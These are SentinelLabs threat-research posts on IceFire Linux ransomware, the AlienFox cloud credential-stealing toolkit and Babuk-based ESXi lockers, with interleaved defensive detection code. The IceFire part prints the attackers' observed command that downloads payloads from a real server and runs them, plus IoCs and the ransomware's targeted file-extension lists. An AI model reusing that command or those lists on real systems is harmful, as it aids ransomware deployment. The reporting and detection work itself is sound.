SentinelLabs

IceFire Ransomware Returns | Now Targeting Linux Enterprise Networks

9 March 2023 at 13:58

Executive Summary

  • In recent weeks SentinelLabs observed novel Linux versions of IceFire ransomware being deployed within the enterprise network intrusions of several media and entertainment sector organizations worldwide.
  • Current observations indicate that the attackers deployed the ransomware by exploiting CVE-2022-47986, a deserialization vulnerability in IBM Aspera Faspex file sharing software.
  • The operators of the IceFire malware, who previously focused only on targeting Windows, have now expanded their focus to include Linux. This strategic shift is a significant move that aligns them with other ransomware groups who also target Linux systems.

Background

SentinelLabs recently observed a novel Linux version of the IceFire ransomware being deployed in mid February against enterprise networks. The iFire file extension is associated with known reports of IceFire, a ransomware family noted by MalwareHunterTeam in March 2022.

Another new ransomware just appeared: IceFire.
Note: iFire-readme.txt
Extension: .iFire
Already seen victim companies from multiple countries, including multiple victims from 1-1 countries in the past < 40 hours, so they started “hard” it seems…@demonslay335 pic.twitter.com/QfguAicNYO

— MalwareHunterTeam (@malwrhunterteam) March 14, 2022

Prior to this report, IceFire had only shown a Windows-centric focus. The attackers’ tactics are consistent with those of the ‘big-game hunting’ (BGH) ransomware families, which involve double extortion, targeting large enterprises, using numerous persistence mechanisms, and evading analysis by deleting log files. Previous reports indicate that IceFire targeted technology companies; SentinelLabs observed these recent attacks against organizations in the media and entertainment sector. IceFire has impacted victims in Turkey, Iran, Pakistan, and the United Arab Emirates, which are typically not a focus for organized ransomware actors.

Technical Analysis

The IceFire Linux version (SHA-1: b676c38d5c309b64ab98c2cd82044891134a9973) is a 2.18 MB, 64-bit ELF binary compiled with gcc for AMD64 architecture. We tested the sample on Intel-based distributions of Ubuntu and Debian; IceFire ran successfully on both test systems.

In observed intrusions, the Linux version was deployed against CentOS hosts running a vulnerable version of the IBM Aspera Faspex file server software. The system downloaded two payloads using wget and saved them to /opt/aspera/faspex:

sh -c rm -f demo iFire && wget hxxp[://]159.65.217.216:8080/demo && wget hxxp[://]159.65.217.216:8080/{redacted_victim_server}/iFire && chmod +x demo && ./demo

On execution, files are encrypted and renamed with the “.ifire” extension appended to the file name. IceFire then deletes itself by removing the binary, which is evident in the picture below.

Files on the user desktop of a Debian system before and after running IceFire

The “.iFire” extension is appended to the file name. IceFire skipped the files with “.sh” and “.cfg” extensions.

A file with the CPP extension that was encrypted by IceFire
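The three behaviours just described (a ransom note written into each directory, files renamed with .iFire appended, and the binary removing itself after the run) are enough for a host-level detection. The following is an added example, not code from the report or from SentinelLabs. It parses a constructed, simplified file-event feed (the "timestamp pid exe op path" line layout is an assumption standing in for auditd or EDR output) and raises one alert per behaviour; a sliding window flags a single process that renames several files to .iFire in quick succession as mass encryption.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Behaviours described in the report: per-directory ransom note, ".iFire" appended
# to encrypted files, and the binary unlinking itself after the run.
NOTE_NAME = "iFire-readme.txt"
ENC_SUFFIX = ".ifire"                 # compared case-insensitively (assumption: the report shows both .ifire and .iFire)
BURST_COUNT = 5                       # tuning knob, not a value from the report
BURST_WINDOW = timedelta(seconds=60)  # tuning knob, not a value from the report

# Constructed file-event lines (not real telemetry) in a simplified
# "ts pid exe op path [-> newpath]" layout; the layout itself is an assumption.
SAMPLE_EVENTS = """\
2023-02-15T10:05:00Z 4242 /opt/aspera/faspex/demo CREATE /home/alice/docs/iFire-readme.txt
2023-02-15T10:05:01Z 4242 /opt/aspera/faspex/demo RENAME /home/alice/docs/q1.xlsx -> /home/alice/docs/q1.xlsx.iFire
2023-02-15T10:05:02Z 4242 /opt/aspera/faspex/demo RENAME /home/alice/docs/plan.docx -> /home/alice/docs/plan.docx.iFire
2023-02-15T10:05:03Z 4242 /opt/aspera/faspex/demo RENAME /home/alice/docs/site.cpp -> /home/alice/docs/site.cpp.iFire
2023-02-15T10:05:04Z 4242 /opt/aspera/faspex/demo RENAME /home/alice/docs/arch.pdf -> /home/alice/docs/arch.pdf.iFire
2023-02-15T10:05:05Z 4242 /opt/aspera/faspex/demo RENAME /home/alice/docs/vm.vmdk -> /home/alice/docs/vm.vmdk.iFire
2023-02-15T10:05:09Z 4242 /opt/aspera/faspex/demo UNLINK /opt/aspera/faspex/demo
2023-02-15T10:06:00Z 900 /usr/bin/mv RENAME /home/bob/draft.txt -> /home/bob/final.txt
"""

EVENT_RE = re.compile(
    r"^(?P<ts>\S+) (?P<pid>\d+) (?P<exe>\S+) (?P<op>CREATE|RENAME|UNLINK) "
    r"(?P<path>\S+)(?: -> (?P<new>\S+))?$"
)


def parse_events(text):
    """Parse the simplified event lines into dicts; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ")
        e["pid"] = int(e["pid"])
        events.append(e)
    return events


def detect_icefire(events):
    """Return (rule, pid, detail) alerts for the three IceFire behaviours."""
    alerts = []
    rename_times = defaultdict(list)
    for e in events:
        if e["op"] == "CREATE" and e["path"].rsplit("/", 1)[-1] == NOTE_NAME:
            alerts.append(("ransom_note_created", e["pid"], e["path"]))
        elif e["op"] == "RENAME" and e["new"] and e["new"].lower().endswith(ENC_SUFFIX):
            rename_times[e["pid"]].append(e["ts"])
        elif e["op"] == "UNLINK" and e["path"] == e["exe"]:
            alerts.append(("self_delete", e["pid"], e["exe"]))
    # Sliding window: flag a process once if it renamed BURST_COUNT files to .iFire within BURST_WINDOW
    for pid, times in rename_times.items():
        times.sort()
        for i in range(len(times)):
            j = i
            while j < len(times) and times[j] - times[i] <= BURST_WINDOW:
                j += 1
            if j - i >= BURST_COUNT:
                alerts.append(("mass_rename_to_ifire", pid, f"{j - i} files within {BURST_WINDOW.seconds}s"))
                break
    return alerts


if __name__ == "__main__":
    for alert in detect_icefire(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

The ransom note name and the self-unlink are the higher-confidence signals: legitimate tooling rarely creates iFire-readme.txt or removes its own executable mid-run, whereas the rename threshold needs tuning against normal file churn on the host.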

Excluded Files & Folders

The sample contains data segment references to a list of file extensions. These extensions are excluded from encryption, as they pertain to executables or to application or system functionality. In the case of .txt and .pid, encrypting these files could impede the ransomware’s own functionality.

.cfg .o .sh .img .txt .xml .jar .pid .ini .pyc .a .so .run .env .cache .xmlb

The following file extensions are targeted for encryption:

.sample .pack .idx .bitmap .gzip .bundle .rev .war .7z .3ds .accdb .avhd .back .cer .ctl .cxx .dib .disk .dwg .fdb .jfif .jpe .kdbx .nrg .odc .odf .odg .odi .odm .odp .ora .ost .ova .ovf .p7b .p7c .pfx .pmf .ppt .qcow .rar .tar .tib .tiff .vbox .vcb .vdi .vfd .vhd .vhdx .vmc .vmdk .vmsd .vmtm .vsdx .vsv .work .xvd .vswp .nvram .vmxf .vmem .vmsn .vmss .wps .cad .mp4 .wmv .rm .aif .pdf .doc .docx .eml .msg .mail .rtf .vbs .c .cpp .cs .pptx .xls .xlsx

IceFire ransomware doesn’t encrypt all files on Linux: it avoids encrypting certain paths, so that critical parts of the system are not encrypted and remain operational. In one observed infection, the /srv directory was encrypted, so these exclusions can be selectively overridden.

Folder Description
/boot Data used at startup
/dev Device files, drivers
/etc System configuration files
/lib Shared libraries used by applications or system for dynamically-linked functionality
/proc Virtual filesystem used by Linux to store runtime system information like PIDs, mounted drives, system configuration, etc.
/srv Web server directories
/sys Interface to the kernel; similar to /proc
/usr User-level binaries and static data
/var Dynamic data, e.g. caches, databases
/run System information, including PID files; cleared on each reboot

During our analysis, the user profile directory at /home/[user_name]/ saw the most encryption activity. IceFire targets user and shared directories (e.g., /mnt, /media, /share) for encryption; these are unprotected parts of the file system that do not require elevated privileges to write or modify.
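To estimate what a host would lose, the exclusion and target lists above can be applied to a file inventory (for example the output of `find / -type f` from a host matching the affected profile). The following is an added example, not code from the report: it classifies each absolute path with the directory exclusions taking precedence over the extension lists (case-insensitive extension matching is an assumption), lets the /srv exclusion be switched off to model the infection in which /srv was encrypted, and summarises targeted files per top-level directory. The inventory is constructed.

```python
from collections import Counter
from pathlib import PurePosixPath

# Lists transcribed from the report: extensions IceFire skips, extensions it targets,
# and top-level directories it leaves alone (/srv was seen overridden in one intrusion).
EXCLUDED_EXT = set(".cfg .o .sh .img .txt .xml .jar .pid .ini .pyc .a .so .run .env .cache .xmlb".split())
TARGETED_EXT = set("""
.sample .pack .idx .bitmap .gzip .bundle .rev .war .7z .3ds .accdb .avhd .back .cer .ctl .cxx
.dib .disk .dwg .fdb .jfif .jpe .kdbx .nrg .odc .odf .odg .odi .odm .odp .ora .ost .ova .ovf
.p7b .p7c .pfx .pmf .ppt .qcow .rar .tar .tib .tiff .vbox .vcb .vdi .vfd .vhd .vhdx .vmc .vmdk
.vmsd .vmtm .vsdx .vsv .work .xvd .vswp .nvram .vmxf .vmem .vmsn .vmss .wps .cad .mp4 .wmv .rm
.aif .pdf .doc .docx .eml .msg .mail .rtf .vbs .c .cpp .cs .pptx .xls .xlsx
""".split())
EXCLUDED_DIRS = {"/boot", "/dev", "/etc", "/lib", "/proc", "/srv", "/sys", "/usr", "/var", "/run"}


def _top_level(p: PurePosixPath) -> str:
    """Top-level directory name of an absolute path ('home' for /home/alice/x), '' otherwise."""
    return p.parts[1] if p.is_absolute() and len(p.parts) > 1 else ""


def icefire_verdict(path: str, srv_excluded: bool = True) -> str:
    """Classify one path as 'excluded_dir', 'excluded_ext', 'targeted' or 'not_listed'.

    Directory exclusion is checked before the extension lists. Extension matching is
    case-insensitive (assumption: the report shows both '.ifire' and '.iFire').
    """
    p = PurePosixPath(path)
    top = "/" + _top_level(p) if _top_level(p) else ""
    if top in EXCLUDED_DIRS and (top != "/srv" or srv_excluded):
        return "excluded_dir"
    ext = p.suffix.lower()
    if ext in EXCLUDED_EXT:
        return "excluded_ext"
    if ext in TARGETED_EXT:
        return "targeted"
    return "not_listed"


def triage_inventory(paths, srv_excluded: bool = True):
    """Return (paths IceFire would target, count of targeted files per top-level directory)."""
    hits, per_dir = [], Counter()
    for path in paths:
        if icefire_verdict(path, srv_excluded) == "targeted":
            hits.append(path)
            per_dir[_top_level(PurePosixPath(path)) or "."] += 1
    return hits, dict(per_dir)


# Constructed inventory (not from the report)
SAMPLE_INVENTORY = [
    "/home/alice/docs/report.docx",
    "/home/alice/deploy.sh",
    "/home/alice/notes.txt",
    "/home/alice/backup.tar",
    "/mnt/share/vm/disk.vmdk",
    "/etc/ssh/sshd_config",
    "/srv/www/site/brochure.pdf",
    "/var/lib/mysql/ibdata1",
    "/opt/app/config.yaml",
]

if __name__ == "__main__":
    hits, per_dir = triage_inventory(SAMPLE_INVENTORY)
    print(len(hits), "files in scope:", per_dir)
```

The per-directory counts are the useful output for prioritising backups and monitoring: in the report's own observations the bulk of encryption landed under /home and the shared mounts, which is exactly where this classification concentrates the hits.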

Interestingly, several file sharing clients downloaded benign encrypted files after IceFire had encrypted the file server’s shared folders. Despite the attack on the server, clients were still able to download files from the encrypted server. This implies the IceFire developer made thoughtful choices in the excluded paths and file extensions.

IceFire Linux Payload Delivery & Infrastructure

IceFire for Windows is delivered through phishing messages and pivoting using post-exploitation frameworks. The Linux variant is in its infancy, though our observations indicate it was deployed using an exploit for CVE-2022-47986, a recently patched vulnerability in IBM’s Aspera Faspex file sharing software.

IceFire payloads are hosted on a DigitalOcean droplet at 159.65.217.216 with the following URL format:

hxxp[://]159.65.217.216:8080/(subdomain.domain.TLD|IP_Address)/iFire

The following regular expression can be used to detect IceFire payload URLs. Consider wildcarding the DigitalOcean IP address in case the actors pivot to a new delivery IP or domain.

http:\/\/159\.65\.217\.216:8080\/(([a-z]+\.){2}([a-z]+)|((25[0-5]|(2[0-4]|1\d|[1-9]|)\d)\.?\b){4})\/iFire
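Running the pattern over proxy or web logs, as an added example that is not code from the report: the first pattern is the page's regex (slashes left unescaped, which Python does not require) written without a `^` anchor inside the IP alternative, since an anchor there can never match mid-string and would silently disable the IP-address form of the URL; the second wildcards the delivery host to any IPv4 address, as the text suggests. The log lines are constructed and the hostnames are documentation placeholders.

```python
import re

# The page's pattern: subdomain.domain.tld or a dotted IPv4 address between the host and /iFire.
ICEFIRE_URL_RE = re.compile(
    r"http://159\.65\.217\.216:8080/"
    r"(([a-z]+\.){2}([a-z]+)|((25[0-5]|(2[0-4]|1\d|[1-9]|)\d)\.?\b){4})"
    r"/iFire"
)

# Same path shape with the delivery host wildcarded to any IPv4 address.
ICEFIRE_URL_ANYHOST_RE = re.compile(
    r"http://(?:\d{1,3}\.){3}\d{1,3}:8080/"
    r"(([a-z]+\.){2}([a-z]+)|((25[0-5]|(2[0-4]|1\d|[1-9]|)\d)\.?\b){4})"
    r"/iFire"
)

# Constructed proxy log lines (not from the report); hostnames are placeholders.
SAMPLE_PROXY_LOG = """\
2023-02-15T10:01:02Z 10.0.0.5 GET http://159.65.217.216:8080/demo 200
2023-02-15T10:01:05Z 10.0.0.5 GET http://159.65.217.216:8080/files.example.com/iFire 200
2023-02-15T10:02:11Z 10.0.0.5 GET http://159.65.217.216:8080/10.0.0.5/iFire 200
2023-02-15T10:03:00Z 10.0.0.9 GET http://198.51.100.7:8080/mail.example.org/iFire 200
2023-02-15T10:04:00Z 10.0.0.9 GET http://example.com/index.html 200
"""


def find_icefire_urls(log_text: str, any_host: bool = False):
    """Return the payload URLs found in a log blob, in order of appearance."""
    pattern = ICEFIRE_URL_ANYHOST_RE if any_host else ICEFIRE_URL_RE
    return [m.group(0) for m in pattern.finditer(log_text)]


if __name__ == "__main__":
    for url in find_icefire_urls(SAMPLE_PROXY_LOG, any_host=True):
        print(url)
```

Note that the `/demo` stager URL listed under Indicators of Compromise does not match either pattern and needs its own indicator; the hostname alternative also only matches three lowercase labels, so victims with deeper or mixed-case hostnames in the path would be missed by the exact pattern.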

Open-source intelligence platforms revealed a history of Aspera Faspex activity on IP address 159.65.217.216, including:

  • Other payload URLs with “aspera” in the secondary hostname section of the URI
  • Session cookie name: _aspera_faspex_session
  • Service fingerprinting indexed a vulnerable version of Aspera Faspex software

Notable Findings

As of this writing, the IceFire binary was detected by 0/61 VirusTotal engines. Notably, this sample contains many statically linked functions from the legitimate OpenSSL library, contributing to the relatively large file size.

The binary contains the following hardcoded RSA public key:

-----BEGIN RSA PUBLIC KEY-----

MIIBCgKCAQEA0lImq1tu0GPOv0cj78WMTeI+l9Coo0U5VtXj1/13Hds3HVXL5K3+\nZYn/ygsTmRByTU/ZvwoWPqozH4N+RTj0W3MG6KSew1n2duKIkBiexMDN+Ip/qP2w\nFadqimzD/OuBhTwh6LrhX6YVtu9rrpCbhmcsobUurChql0+EOItH/NRL1PpbkDPP\nc0pdChRcv9OQ0Hbz9xsFYnfchqLswzyq2CnuUu+ihjLcIwNd4FsYS+Zw9OCH0gnE\nj6AQgWr0y831JkHRFSEq24DXIXyZD2JZ1Rnts3i/zLSgalop47QeV9DIXOgBGxxK\ndvO6XAEBWx9cYMEk2oTvk50y8/U41+5GFQIDAQAB

-----END RSA PUBLIC KEY-----

In a cryptographic logging function, the binary contains an embedded path referencing the Desktop of a user named “Jhone.” The .cnf extension potentially refers to a configuration file. The relic sits near the end of the OpenSSL functionality; it is possible that the artifact came from the OpenSSL package rather than from the ransomware developer.

Function for writing a log file to user Jhone’s Desktop

Ransom Notes

IceFire drops the ransom note from an embedded resource in the binary and writes it to each directory targeted for file encryption. The ransom note contains a hardcoded username and password that are required to log into the ransom payment portal hosted on a Tor hidden service at 7kstc545azxeahkduxmefgwqkrrhq3mzohkzqvrv7aekob7z3iwkqvyd[.]onion.

Linux version of IceFire ransom note

The Linux version’s Onion hostname matches the hostname that ransomware trackers tie to IceFire, including attacks targeting Windows.

IceFire ransom login page
IceFire victim leaks page

Conclusion

This evolution of IceFire reinforces that ransomware targeting Linux continues to grow in popularity through 2023. While the groundwork was laid in 2021, the Linux ransomware trend accelerated in 2022 when illustrious groups added Linux encryptors to their arsenals, including BlackBasta, Hive, Qilin, Vice Society aka HelloKitty, and others.

In comparison to Windows, Linux is more difficult to deploy ransomware against–particularly at scale. Many Linux systems are servers: typical infection vectors like phishing or drive-by download are less effective. To overcome this, actors turn to exploiting application vulnerabilities, as the IceFire operator demonstrated by deploying payloads through an IBM Aspera vulnerability.

Indicators of Compromise

SHA-1: b676c38d5c309b64ab98c2cd82044891134a9973
Payload URLs: hxxp[://]159.65.217.216:8080/demo

Dissecting AlienFox | The Cloud Spammer’s Swiss Army Knife

30 March 2023 at 09:55

Executive Summary

  • SentinelLabs analyzed several iterations of “AlienFox,” a comprehensive toolset for harvesting credentials for multiple cloud service providers.
  • Attackers use AlienFox to harvest API keys & secrets from popular services including AWS SES & Microsoft Office 365.
  • AlienFox is a modular toolset primarily distributed on Telegram in the form of source code archives. Some modules are available on GitHub for any would-be attacker to adopt.
  • The spread of AlienFox represents an unreported trend towards attacking more minimal cloud services, unsuitable for cryptomining, in order to enable and expand subsequent campaigns.
  • Along with our thorough analysis of different AlienFox iterations, we provide a full list of indicators of compromise, YARA rules, and recommendations in the full report.

Overview

SentinelLabs has identified a new toolkit dubbed AlienFox that attackers are using to compromise email and web hosting services. AlienFox is highly modular and evolves regularly. Most of the tools are open source, meaning that actors can readily adapt and modify them to suit their needs. Many developers take credit on different iterations of the tools. The evolution of recurring features suggests the developers are becoming increasingly sophisticated, with performance considerations at the forefront in more recent versions.

Actors use AlienFox to collect lists of misconfigured hosts from security scanning platforms, including LeakIX and SecurityTrails. They use multiple scripts in the toolset to extract sensitive information such as API keys and secrets from configuration files exposed on victims’ web servers.

Later versions of the toolset added scripts that automate malicious actions using the stolen credentials, including:

  • Establishing Amazon Web Services (AWS) account persistence and privilege escalation
  • Collecting send quotas and automating spam campaigns through victim accounts or services

SentinelLabs’ full report provides more details of AlienFox distribution and targeting, along with a detailed analysis of the entire toolset. A comprehensive list of Indicators of Compromise can also be found there.


AlienFox V4 logo

Targeting

AlienFox is a framework of tools that target a variety of web services, though the overarching theme for the toolset is cloud-based and software-as-a-service (SaaS) email hosting services.

Current observations indicate that AlienFox targeting is primarily opportunistic. The actors rely on server misconfigurations associated with popular web frameworks, including Laravel, Drupal, Joomla, Magento, Opencart, Prestashop, and WordPress. The toolsets contain scripts designed to check for the aforementioned services; each script requires a list of targets read from a text file. These ‘target’ files are generated by a separate script, such as grabip.py and grabsite.py. The target generation scripts use a combination of brute force for IPs and subnets, as well as web APIs for open-source intelligence platforms to provide details about potential targets. We observed scripts leveraging the SecurityTrails and LeakIX platforms’ API.

When a susceptible server is identified, the actor parses exposed environment or configuration files that store sensitive information, such as services enabled and the associated API keys and secrets. We found scripts targeting tokens and secrets from:

  • 1and1
  • AWS
  • Bluemail
  • Exotel
  • Google Workspace
  • Mailgun
  • Mandrill
  • Nexmo
  • Office365
  • OneSignal
  • Plivo
  • Sendgrid
  • Sendinblue
  • Sparkpostmail
  • Tokbox
  • Twilio
  • Zimbra
  • Zoho

Versioning

The tool techniques and their organization vary across versions. To date, we have identified AlienFox versions 2 through 4, which date from February 2022 onward. Several scripts we analyzed have been summarized by other researchers as the malware families Androxgh0st and GreenBot (aka Maintance). As those researchers noted, the scripts are readily available in open sources including GitHub, which lends itself to constant adaptation and variation in the wild.

AlienFox V2

The oldest of the known AlienFox toolsets, Version 2 focuses primarily on extracting credentials from web server configuration or environment files. The archive we analyzed contains output from when an actor ran the tools, which included AWS access & secret keys. In this version of the AlienFox toolset, the core utility is housed in a script named s3lr.py, which is similar to env.py outlined in later versions.

Version 2 contains awses.py, a script that uses the AWS SDK Boto3 Python client to automate activities related to AWS Simple Email Service (SES), including sending & receiving messages and applying an elevated privilege persistence profile to the AWS account.

The kirimi function in awses.py checks for SES send quotas and retrieves email addresses in the targeted account’s SES configuration

Additionally, Version 2 contains ssh-smtp.py, which parses configuration files for credentials and uses the Paramiko Python library to validate SSH configurations on the targeted web server. This script also contains encoded commands that potentially target CVE-2022-31279, a rejected Laravel PHP Framework deserialization vulnerability.

Code from ssh-smtp.py’s get_appkey function, including the decoded payloads

A more complete analysis of AlienFox v2 can be found in the full report.

AlienFox V3.x

Of the three known major versions of AlienFox, we identified the most unique archives labeled as Version 3. We observed the following name variations and respective file creation dates:

  • ALIEN-FOX AFV 3.0 Izmir – February 2022
  • ALIENFOX III V3.0 AFV.EXE – February 2022
  • ALIEN-FOX AFV 3.5 JAGAUR – April 2022
  • ALIEN-FOX AFV 3.5 rondrickmadeit – February 2022

Version 3.x contained the first observed version of the script Lar.py, which automates extraction of keys and secrets from compromised Laravel .env files and logs the results to a text file along with the targeted server details. Lar.py was uploaded to VirusTotal along with the script’s output, providing us a glimpse into its utility to threat actors.

Output written by Lar.py to aws_access_key_secret.txt

Output from lar.py to Result/office.txt

It is worth noting that each of the SES-abusing toolsets we analyzed targets servers using the Laravel PHP framework, which could indicate that Laravel is particularly susceptible to misconfigurations or exposures.

Lar.py is coded in a more mature way than the AlienFox Version 2 scripts and their derivatives. Lar.py applies threading, Python classes with modular functions, and initialization variables. The author also adds tags to the stolen data output that logs whether the data was harvested using a configuration parser (.env method) or through a regular expression (debug method), which demonstrates an awareness of efficacy metrics.

AlienFox V4

The most recent of the known toolsets, this set is organized much differently, with each tool assigned a numerical identifier (e.g., Tool1, Tool2). There is a core script in the AlienFox root directory named ALIENFOXV4.py that serves as a bootstrap for the numbered tool scripts in the child folders.

Tools 5, 6, 7, and 8 collect lists of targets, while other tools check whether the targets are misconfigured or exposed. For example, Tool17 contains cms.py, a script that checks sites for the presence of WordPress, Joomla, Drupal, Prestashop, Magento, and Opencart. Tool13 contains AWS and SES-centric functionality similar to that seen in Version 2’s BTC.py.

While the aforementioned tools are well aligned with the older versions of AlienFox, several new additions suggest the developer is expanding the audience for the toolset or potentially augmenting the capabilities offered to the toolset’s existing customer base. For example, Tool16 is an Amazon.com retail site account checker: it checks whether an email address is already associated with an Amazon account and, if not, creates a new Amazon account using that email address.

Additionally, Tools 19 (BTC.py) and 20 (ETH.py) automate the generation of cryptocurrency wallet seeds for Bitcoin and Ethereum, respectively. Despite this functionality, the internal name for the last two tools describes the scripts as a “Wallet Cracker.”

Wallet seed generation in ETH.py

We explore the tools mentioned above in greater detail in the full report.

Recommendations

To defend against AlienFox tools, organizations should use configuration management best practices and adhere to the principle of least privilege. Consider using a Cloud Workload Protection Platform (CWPP) on virtual machines and containers to detect interactive activity with the OS.

Because activities like brute-force or password spray attempts may not be logged by certain service providers, we recommend monitoring for follow-on actions, including the creation of new accounts or service profiles–particularly those with high privilege. Additionally, consider monitoring for newly added email addresses in platforms where your organization conducts email campaigns.
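The monitoring advice above (new accounts or service profiles with high privilege, and newly added sending identities) maps onto a handful of IAM and SES CloudTrail event names. The following is an added example, not code from the report or from SentinelLabs. It runs over constructed, simplified CloudTrail-style records (the event names are real IAM and SES API calls; the account ID, ARNs, IP addresses and email addresses are placeholders, and the ten-minute follow-on window is an assumption) and correlates them per calling identity, so that a send-quota check followed by a newly verified sender, or a freshly created user immediately given credentials or AdministratorAccess, surfaces as one alert each.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

ADMIN_POLICY_ARN = "arn:aws:iam::aws:policy/AdministratorAccess"
FOLLOW_ON_WINDOW = timedelta(minutes=10)   # assumption: how close "follow-on" actions must be

# Constructed, simplified CloudTrail-style records (not real telemetry).
SAMPLE_TRAIL = json.loads("""[
 {"eventTime":"2023-03-01T10:00:00Z","eventSource":"ses.amazonaws.com","eventName":"GetSendQuota",
  "userIdentity":{"arn":"arn:aws:iam::111122223333:user/web-app"},"sourceIPAddress":"203.0.113.10",
  "requestParameters":null},
 {"eventTime":"2023-03-01T10:00:40Z","eventSource":"iam.amazonaws.com","eventName":"CreateUser",
  "userIdentity":{"arn":"arn:aws:iam::111122223333:user/web-app"},"sourceIPAddress":"203.0.113.10",
  "requestParameters":{"userName":"backup-svc"}},
 {"eventTime":"2023-03-01T10:00:55Z","eventSource":"iam.amazonaws.com","eventName":"AttachUserPolicy",
  "userIdentity":{"arn":"arn:aws:iam::111122223333:user/web-app"},"sourceIPAddress":"203.0.113.10",
  "requestParameters":{"userName":"backup-svc","policyArn":"arn:aws:iam::aws:policy/AdministratorAccess"}},
 {"eventTime":"2023-03-01T10:01:10Z","eventSource":"iam.amazonaws.com","eventName":"CreateAccessKey",
  "userIdentity":{"arn":"arn:aws:iam::111122223333:user/web-app"},"sourceIPAddress":"203.0.113.10",
  "requestParameters":{"userName":"backup-svc"}},
 {"eventTime":"2023-03-01T10:02:00Z","eventSource":"ses.amazonaws.com","eventName":"VerifyEmailIdentity",
  "userIdentity":{"arn":"arn:aws:iam::111122223333:user/web-app"},"sourceIPAddress":"203.0.113.10",
  "requestParameters":{"emailAddress":"promo@example.net"}},
 {"eventTime":"2023-03-01T14:30:00Z","eventSource":"iam.amazonaws.com","eventName":"CreateUser",
  "userIdentity":{"arn":"arn:aws:iam::111122223333:user/admin-jane"},"sourceIPAddress":"198.51.100.4",
  "requestParameters":{"userName":"new-hire"}}
]""")


def _ts(e):
    return datetime.strptime(e["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


def _actor(e):
    return e["userIdentity"]["arn"]


def _param(e, key):
    return (e.get("requestParameters") or {}).get(key)


def detect_credential_abuse(events):
    """Correlate IAM/SES events per calling identity and return a list of alert dicts."""
    alerts = []
    by_actor = defaultdict(list)
    for e in sorted(events, key=_ts):
        by_actor[_actor(e)].append(e)
    for actor, evs in by_actor.items():
        for i, e in enumerate(evs):
            name = e["eventName"]
            later = [x for x in evs[i + 1:] if _ts(x) - _ts(e) <= FOLLOW_ON_WINDOW]
            if name in ("AttachUserPolicy", "AttachRolePolicy", "AttachGroupPolicy") \
                    and _param(e, "policyArn") == ADMIN_POLICY_ARN:
                principal = _param(e, "userName") or _param(e, "roleName") or _param(e, "groupName")
                alerts.append({"rule": "admin_policy_attached", "actor": actor, "detail": principal})
            elif name == "CreateUser":
                new_user = _param(e, "userName")
                creds = [x["eventName"] for x in later
                         if x["eventName"] in ("CreateAccessKey", "CreateLoginProfile")
                         and _param(x, "userName") == new_user]
                if creds:
                    alerts.append({"rule": "new_user_with_fresh_credentials", "actor": actor,
                                   "detail": f"{new_user}: {', '.join(creds)}"})
            elif name == "GetSendQuota":
                emails = [_param(x, "emailAddress") for x in later
                          if x["eventName"] in ("VerifyEmailIdentity", "VerifyEmailAddress")]
                if emails:
                    alerts.append({"rule": "send_quota_check_then_new_identity", "actor": actor,
                                   "detail": ", ".join(emails)})
    return alerts


if __name__ == "__main__":
    for alert in detect_credential_abuse(SAMPLE_TRAIL):
        print(alert)
```

The second CreateUser, issued by an administrator with no follow-on credential creation, produces no alert: the point of correlating per identity is to separate routine provisioning from the harvest-then-persist sequence the toolset automates, and an application identity such as the web-app user issuing IAM writes at all is itself worth a rule in environments where that never happens legitimately.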

Conclusion

The AlienFox toolset demonstrates another stage in the evolution of cybercrime in the cloud. Cloud services have well-documented, powerful APIs, enabling developers of all skill levels to readily write tooling for the service. The toolset has gradually improved through improved coding practices as well as the addition of new modules and capabilities.

Opportunistic cloud attacks are no longer confined to cryptomining: AlienFox tools facilitate attacks on minimal services that lack the resources needed for mining. By analyzing the tools and tool output, we found that actors use AlienFox to identify and collect service credentials from misconfigured or exposed services. For victims, compromise can lead to additional service costs, loss in customer trust, and remediation costs.

Indicators of Compromise

A comprehensive list of IoCs appears in the full report.


Hypervisor Ransomware | Multiple Threat Actor Groups Hop on Leaked Babuk Code to Build ESXi Lockers

11 May 2023 at 09:55

Executive Summary

  • SentinelLabs identified 10 ransomware families using VMware ESXi lockers based on the 2021 Babuk source code leaks.
  • These variants emerged through H2 2022 and H1 2023, which shows an increasing trend of Babuk source code adoption.
  • Leaked source code enables actors to target Linux systems when they may otherwise lack expertise to build a working program.
  • Source code leaks further complicate attribution, as more actors will adopt the tools.

Background

Throughout early 2023, SentinelLabs observed an increase in VMware ESXi ransomware based on Babuk (aka Babak, Babyk). The Babuk leaks in September 2021 provided unprecedented insight into the development operations of an organized ransomware group.

Due to the prevalence of ESXi in on-prem and hybrid enterprise networks, these hypervisors are valuable targets for ransomware. Over the past two years, organized ransomware groups adopted Linux lockers, including ALPHV, Black Basta, Conti, Lockbit, and REvil. These groups focus on ESXi before other Linux variants, leveraging built-in tools for the ESXi hypervisor to kill guest machines, then encrypt crucial hypervisor files.

We identified overlap between the leaked Babuk source code and ESXi lockers attributed to Conti and REvil, with iterations of the latter sharply resembling one another. We also compared them to the leaked Conti Windows locker source code, finding shared, bespoke function names and features.

In addition to these notorious groups, we also found smaller ransomware operations using the Babuk source code to generate more recognizable ESXi lockers. Ransom House’s Mario and a previously undocumented ESXi version of Play Ransomware comprise a small handful of the growing Babuk-descended ESXi locker landscape.

Babuk Background

Babuk was one of the early players in the ESXi ransomware space. The group’s longevity was crippled in 2021 when a Babuk developer leaked the builder source code for Babuk’s C++-based Linux Executable & Linkable Format (ELF) ESXi, Golang-based Network Attached Storage (NAS), and C++-based Windows ransomware tooling.

Through early 2022, there were few indications that actors had adapted the leaked Babuk source code, aside from a short-lived ‘Babuk 2.0’ variant and the occasional new Windows ransomware du jour. As cybercrime research is often laser-focused on Windows, Linux trends can develop under the radar.

SentinelLabs identified Babuk-descended ransomware through the string Doesn’t encrypted files: %d\n in the source code’s /бабак/esxi/enc/main.cpp.

Unique strings in Babuk source code main.cpp

The Babuk builder specifies a file name for the newly generated binary, e_esxi.out. Several samples we identified share a similar naming convention:

Ransomware Family File Name
Mario emario.out
Play e_esxi.out
Babuk 2023 aka XVGV RansomWare-e_esxi-XVGV2.out
